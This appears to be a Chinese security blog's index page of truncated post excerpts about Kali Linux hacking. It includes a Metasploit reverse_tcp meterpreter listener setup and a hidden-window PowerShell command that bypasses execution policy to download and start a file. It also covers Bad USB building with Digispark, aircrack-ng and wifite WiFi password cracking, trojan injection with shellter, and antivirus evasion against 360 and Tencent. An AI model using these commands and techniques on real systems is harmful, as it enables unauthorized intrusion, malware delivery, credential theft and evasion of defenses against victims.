lingmessy的博客

监听参数use exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 127.0.0.1set LPORT 4444set ExitOnSession falseset SessionCommunicationTimeout 0set SessionExpirationTimeout 0set stagerverifysslcert falseexploit -j -z实际操作发现set Se

$client = new-object System.Net.WebClient$client.DownloadFile('https://xxxxxxxx.xxx','D:\xxxxx/xxxx.xxx')

用digispark开发板制作Bad USB材料：digispark开发板一个软件：arduino IDEAutomatorhttps://github.com/CYRO4S/Automator1.安装digispark开发板的驱动https://github.com/digistump/DigistumpArduino/releases点击选择下载更高版本的驱动下载完后安装2.设置 arduino IDE第一步添加以下开发板管理器网址：http://dig

KALI - 用aircrack-ng暴破wifi密码暴破前要先得到目标wifi的握手包。详细过程请看：KALI - 暴破wifi之抓取握手包1.准备字典可以自己百度找字典或者用一些密码生成器生成字典这里提供使用 kali linux 自带的 rockyou 字典的方法：该字典的路径为：/user/share/wordlists/rockyou.txt.gz使用前要先解压：gzip -d /usr/share/wordlists/rockyou.txt.gz2.开始暴破sudo air

KALI - 暴破wifi之抓取握手包提示：要有外置的 支持 kali 的 usb 无线网卡，虚拟机要把vmware的usb服务和网卡启用。1.查看网卡信息sudo airairmon-ng或者sudo ifconfig2.开启监听模式sudo airmon-ng start wlan0执行成功之后网卡接口变为wlan0mon，可以继续用步骤1的方法查看。3.扫描wifisudo airodump-ng wlan0mon然后会自动扫描列出附近wifi记下目标wifi的频

KALI - 使用wifite自动批量破解wifi密码使用方法直接sudo wifite然后会自动扫描列出附近wifi按 Ctrl+C 停止扫描然后输入要 破解的 wifi 的 NUM (多个NUM可以用逗号隔开)然后回车即可开始自动破解

Kali-Linux-2020.2 设置中文，汉化。Kali-Linux-2020.2和Kali-Linux-2020.1汉化的方法是一样的。但是经常忘了换源导致中文字体下载失败。所以写这篇博客用来填坑。。。1.换源sudo vim /etc/apt/sources.list按 i 进入vim的编辑模式用 # 把用来的注释掉在后面补上国内的源（以阿里源为例）deb http://mirrors.aliyun.com/kali kali-rolling main non-free contr

树莓派kali安装msf一，官网下载官网下载地址：https://apt.metasploit.com/二，安装sudo dpkg -i metasploit-framework_5.0.85+20200414093809_1rapid7-1_armhf.deb

kali安装nessus扫描器一，下载官网下载地址：https://www.tenable.com/downloads/nessus二，安装sudo dpkg -i Nessus-8.10.0-debian6_i386.deb #安装debsudo /etc/init.d/nessusd start #启动nessus然后浏览器打开：https://kali的ip:8834/选择 Nessus Essentials然后用邮箱接收个激活码激活，然后设置

国内常用杀软白名单打勾的代表防不了内容来自：https://cloud.tencent.com/developer/news/596752

远程执行代码Windows远程下载文件到本地并执行cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://127.0.0.1:8089','notepad.exe');start-...

利用nps_payload 免杀360，腾讯电脑管家一、nps_payload介绍nps_payload是2017年开源的工具，安装使用都比较简单,nps_payload可以生成基于msbuild的xml文件和独立执行的hta文件，并对xml文件和hta文件做了一定的混淆免杀，从而达到免杀的效果。nps_payload生成的xml或hta文件都需要使用msbuild来执行。Microsof...

Windows免杀木马+维持权限一.生成木马工具：shellter环境：windows xp，Windows 7操作：cmd 打开 shellter.exe选择a，y输入要注入木马的程序路径选择y，l，1输入返回的ip最后回车就好了二.开始监听环境：kali命令：msfconsoleuse exploit/multi/handlerset...

CVE-2020-0796 SMBv3漏洞复现漏洞简介Microsoft Windows和Microsoft Windows Server都是美国微软（Microsoft）公司的产品，Microsoft Windows是一套个人设备使用的操作系统，Microsoft Windows Server是一套服务器操作系统，Server Message Block是其中的一个服务器信息传输协议。...

Kali-Linux-2020.1 设置中文，汉化。Kali Linux团队在Twitter上宣布：“新的一年是进行重大改变的好时机，因此，我们宣布在 即将发布的2020.1版本中，Kali安全模型也将进行重大改革——默认非root用户。”所以使用kali之前版本的汉化方法可能会出现权限问题。kali 2020.1 汉化打开终端，输入：sudo dpkg-reconfigu...